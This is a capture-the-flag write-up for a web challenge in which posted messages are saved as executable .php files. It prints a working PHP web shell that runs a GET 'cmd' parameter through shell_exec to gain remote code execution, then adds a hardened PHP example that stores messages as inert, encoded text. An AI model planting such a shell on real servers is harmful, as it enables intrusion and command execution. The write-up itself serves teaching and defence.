Category
Web
Description
Look at this neat website I found! It’s not complete yet, but when it is, it will give you personalized music recommendations like you’ve never seen before! I think you should check it out. I left a Valentine as a message on the website 😁
Solution
For this challenge we have a web page where we can post messages. After saving a message, we get a response like the following.
Your message was saved at /message/nnxwh1999.php.
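The message is saved as a .php file at a path we can request, so the server executes its contents as PHP when the file is loaded. Posting a PHP web shell like the following therefore gives us remote code execution.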
<?php
if (!empty($_GET['cmd'])) {
    $cmd = shell_exec($_GET['cmd']);
    echo $cmd;
}
?>
Now all we have to do is run grep valentine using our uploaded shell, and we get the flag in the output.
valentine{n3ver_g0nn4_give_y0u_up}
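The root cause is that user input is stored as a .php file the server will execute. The following is an added example, not the challenge's source code: the vulnerable handler is an assumed reconstruction of the pattern, and the function names, the data directory and the 4096-byte limit are hypothetical. It shows that pattern next to a hardened form that stores the message as inert data and encodes it on output.

```php
<?php
declare(strict_types=1);

// Assumed vulnerable pattern (not the challenge's real source): the raw
// message body is written to a .php file inside the web root, so the server
// runs it as code when the returned URL is requested.
function save_message_vulnerable(string $body, string $webRoot): string
{
    $name = bin2hex(random_bytes(5)) . '.php';
    file_put_contents("$webRoot/message/$name", $body);
    return "/message/$name";
}

// Hardened: store the message as inert data outside the web root under a
// server-chosen id; nothing user-controlled reaches a filename or extension.
function save_message(string $body, string $dataDir): string
{
    if (strlen($body) > 4096) {
        throw new InvalidArgumentException('message too long');
    }
    $id = bin2hex(random_bytes(8));
    if (file_put_contents("$dataDir/$id.txt", $body, LOCK_EX) === false) {
        throw new RuntimeException('could not store message');
    }
    return $id;
}

// Hardened: a fixed script renders the message, validating the id and
// HTML-encoding the body so it is displayed as text and never evaluated.
function render_message(string $id, string $dataDir): string
{
    if (preg_match('/\A[0-9a-f]{16}\z/', $id) !== 1) {
        throw new InvalidArgumentException('bad message id');
    }
    $body = @file_get_contents("$dataDir/$id.txt");
    if ($body === false) {
        throw new RuntimeException('no such message');
    }
    return '<pre>' . htmlspecialchars($body, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</pre>';
}

// Constructed sample input: the payload shape used in this writeup.
$dataDir = sys_get_temp_dir() . '/messages_' . bin2hex(random_bytes(4));
mkdir($dataDir, 0700);
$id = save_message('<?php echo shell_exec($_GET["cmd"]); ?>', $dataDir);
// The stored payload comes back HTML-encoded as plain text.
echo render_message($id, $dataDir), "\n";
```

If messages must stay in a web-served directory, the server should additionally be configured so that PHP is not executed for files in that directory.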